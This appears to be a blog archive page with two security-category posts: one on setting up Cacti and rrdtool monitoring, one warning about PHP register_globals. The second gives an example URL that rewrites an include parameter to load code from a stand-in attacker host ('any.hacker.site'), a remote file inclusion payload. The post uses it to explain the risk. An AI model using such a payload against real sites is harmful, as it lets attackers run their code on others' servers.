Archive

Archive for the ‘Security’ Category

Cacti and rrdtool – a boon to the SysAdmins

February 14th, 2010 No comments

Regrett that I got familiarized with the cacti system only a week back. And once a clean installation was ready and running, the bottle necks started. Running snmpd for monitoring cpu, disk and network was an overkill. Though the snmp helped when we could add our WiFi Access Points, Routers and Switches. Even the traffic from our ISP Load balancer (pfsense) could be added for monitoring. All this was excellent. We got bottle necked at one point though.

Most of our colocated servers were behind heavy firewalls, and or running in virtual box machines inside real hardwares. True that we could use a single snmpd with multiple community id to collect data. But I was just reluctant. Just out of curiosity, the last one week day and night, at home, at work over IRC I was after getting the insides of both cacti and rrdtool. Thanks to the developers of both, and to all those who have contributed towards it. I did find better cacti templates on google code. This was one good step. The MySQL templates are simply superb. Also there is a script in php which does do ssh to remote servers and collect data. Good enough, but needed the cacti host root user to have a public key published on all of our servers.
Read more…

register_globals = on; suicidal

August 7th, 2006 No comments

Yes, unless care is taken while coding. Imagine register globals is on and a include uses a variable from the user submission or from coded in urls like page.php?v=mod/login.php, well this can be manually rewritten to page.php?v=http://any.hacker.site/php_hacktool/hacktool.txt, which will eventually force php to include the remote hostile code into your code.. and provide a method for cunning, hackers to check, inspect or even alter the content.

Check Point Software